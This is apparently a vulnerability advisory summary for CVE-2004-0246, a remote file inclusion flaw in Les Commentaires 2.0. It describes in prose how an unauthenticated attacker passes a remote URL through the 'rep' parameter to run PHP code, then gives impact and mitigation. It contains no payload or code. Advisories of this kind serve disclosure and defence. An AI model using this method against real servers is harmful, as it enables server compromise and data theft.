CVE-2004-0246

Vulnerability

Les Commentaires 2.0 is prone to multiple remote file inclusion vulnerabilities in files fonctions.lib.php, derniers_commentaires.php, and admin.php. The rep parameter is not properly sanitized, allowing an attacker to specify a remote URL that is included and executed by PHP. This affects version 2.0 of the software [1].

Exploitation

An attacker can exploit this by sending a crafted HTTP request to any of the three vulnerable scripts, providing a malicious URL in the rep parameter. The attacker does not need authentication, as these scripts are accessible from the web root. The only requirement is network access to the web server hosting Les Commentaires [1].

Impact

Successful exploitation allows the attacker to execute arbitrary PHP code on the target server in the context of the web server user. This can lead to full compromise of the web application and potentially the underlying system, including data theft, defacement, or further attacks [1].

Mitigation

No official patch or fixed version is detailed in the available references. Users should upgrade to a later version if available, or remove or restrict access to the affected scripts. The advisory does not list this CVE as part of the CISA KEV [1].